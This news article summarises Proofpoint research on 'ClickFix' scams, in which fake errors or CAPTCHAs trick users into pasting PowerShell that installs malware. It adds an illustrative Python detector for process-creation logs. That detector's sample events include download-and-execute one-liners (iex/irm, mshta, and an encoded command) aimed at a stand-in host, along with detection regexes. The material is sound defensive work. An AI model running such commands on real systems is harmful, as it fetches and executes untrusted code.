Hackers Exploit ‘ClickFix’ Scams To Spread Malware
Hackers exploit “ClickFix” social engineering, tricking users with fake errors or CAPTCHA to execute PowerShell, spreading malware globally since 2024.
In a Rush? Here are the Quick Facts!
- ClickFix scams pose as prompts from trusted software such as Microsoft Word and Google Chrome.
- Fake CAPTCHA challenges are part of ClickFix, delivering malware like AsyncRAT and Lumma Stealer.
- ClickFix exploits users’ problem-solving instincts to bypass traditional security measures.
Cybercriminals are increasingly employing a sneaky social engineering tactic called “ClickFix” to distribute malware, targeting individuals’ instinct to troubleshoot problems on their own.
Research published by Proofpoint on Monday documented the growing use of this method, which has been observed in numerous campaigns since March 2024.
The “ClickFix” technique relies on fake error messages displayed through pop-up dialog boxes. These messages appear legitimate and prompt users to fix an alleged issue themselves, explains Proofpoint.
Often, the instructions direct users to copy a provided command and paste it into PowerShell, the Windows command-line shell. Unbeknownst to the user, that single command fetches the malware from an attacker-controlled server and runs it.
Proofpoint has seen this approach used in phishing emails, malicious URLs, and compromised websites.
Threat actors disguise their scams as notifications from trusted sources like Microsoft Word, Google Chrome, and even local services tailored to specific industries, such as logistics or transportation.
A particularly devious variation of ClickFix incorporates fake CAPTCHA challenges, where users are asked to “prove they’re human,” explains Proofpoint.
The CAPTCHA trick is paired with instructions to execute malicious commands that install malware like AsyncRAT, DarkGate, or Lumma Stealer. Notably, a toolkit for this fake CAPTCHA tactic surfaced on GitHub, making it easier for criminals to use.
According to Proofpoint, hackers have targeted a range of organizations globally, including government entities in Ukraine. In one instance, they impersonated GitHub, using fake security alerts to direct users to malicious websites.
These scams have led to malware infections in over 300 organizations.
What makes ClickFix so effective is its ability to bypass many security measures. Since users voluntarily execute the malicious commands, traditional email filters and anti-virus tools are less likely to flag the activity, says Proofpoint.
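Because the malicious command is typed by the victim rather than delivered as an attachment, the place it does show up is endpoint process-creation telemetry (Sysmon Event ID 1 or Windows Security Event 4688). The following Python script is an added example, not code from Proofpoint or from this article: it scores constructed process-creation records for the combination a pasted ClickFix one-liner usually carries (a download cradle plus in-memory execution, often with a hidden window, an execution-policy bypass or a base64 -EncodedCommand, launched from an interactive parent such as explorer.exe rather than a scheduler or management agent). The indicator patterns, the interactive-parent heuristic, the sample events and the example.invalid hostnames are all assumptions made for illustration, not a vendor signature.

```python
"""Heuristic triage of process-creation events for pasted ClickFix-style one-liners.

Added example: the indicator set and sample events below are constructed
assumptions for illustration, not signatures from Proofpoint or the article.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional, Set, Tuple


@dataclass
class ProcEvent:
    """One process-creation record (fields that Sysmon EID 1 / Security 4688 carry)."""
    user: str
    parent_image: str
    image: str
    command_line: str


# A pasted "fix" needs to fetch something and run it; the rest are common trimmings.
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b"
        r"|\bcurl\s+https?://|\bmshta(\.exe)?\s+https?://"),
    # mshta with a URL both fetches and executes, so it counts here as well
    "inline_exec": re.compile(r"(?i)\b(iex|invoke-expression)\b|\bmshta(\.exe)?\s+https?://"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+h(idden)?\b"),
    "policy_bypass": re.compile(r"(?i)-(ep|executionpolicy)\s+bypass\b"),
    "encoded_cmd": re.compile(r"(?i)-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"),
}

# Assumption: a pasted command surfaces as an interpreter started from the desktop
# shell or a console, not as a child of a scheduler or management agent.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe", "conhost.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE text) so the
    indicator scan sees the real payload instead of an opaque blob."""
    m = INDICATORS["encoded_cmd"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return None


def indicators(cmdline: str) -> Set[str]:
    """Names of indicators present in the raw command line or its decoded payload."""
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        texts.append(decoded)
    return {name for name, rx in INDICATORS.items() if any(rx.search(t) for t in texts)}


def classify(ev: ProcEvent) -> Tuple[str, Set[str]]:
    """Return (verdict, hits): 'alert' for an interactively launched interpreter that
    both downloads and does something more, 'review' for weaker matches, else 'ok'."""
    hits = indicators(ev.command_line)
    interactive = basename(ev.image) in INTERPRETERS and basename(ev.parent_image) in INTERACTIVE_PARENTS
    if interactive and "download_cradle" in hits and len(hits) >= 2:
        return "alert", hits
    if "download_cradle" in hits or (interactive and hits):
        return "review", hits
    return "ok", hits


# Constructed sample telemetry; example.invalid is a reserved name, not a real host.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC_PAYLOAD = base64.b64encode("IEX (IRM https://example.invalid/fix)".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcEvent("corp\\alice", r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/fix)"'),
    ProcEvent("corp\\bob", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/captcha.hta"),
    ProcEvent("corp\\carol", r"C:\Windows\explorer.exe", PS,
              f"powershell -NoP -NonI -W Hidden -Enc {ENC_PAYLOAD}"),
    ProcEvent("NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\svchost.exe", PS,
              r"powershell -NoProfile -File C:\Scripts\inventory.ps1"),
    ProcEvent("corp\\dave", r"C:\Windows\explorer.exe", PS,
              'powershell -c "Invoke-WebRequest https://intranet.example/report.csv -OutFile report.csv"'),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict, hits = classify(ev)
        print(f"{verdict:6} {ev.user:22} {sorted(hits)}  {ev.command_line[:60]}")
```

The point of decoding -EncodedCommand before matching is that the visible command line of a ClickFix paste often shows nothing but flags and a base64 blob; the cradle and the execution verb only appear once the blob is rendered back to text. The "review" tier exists so that a legitimate interactive Invoke-WebRequest is not silently dropped but also does not page anyone.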
Proofpoint emphasizes that this tactic is part of a broader trend in hacking: manipulating human behavior rather than just exploiting technical vulnerabilities. Hackers rely on users’ willingness to solve problems independently, often bypassing IT teams in the process.
To counter this threat, organizations should educate employees about ClickFix scams, reinforcing the importance of skepticism toward unsolicited troubleshooting instructions.
Staying vigilant and reporting suspicious emails or pop-ups can help prevent falling victim to these crafty attacks.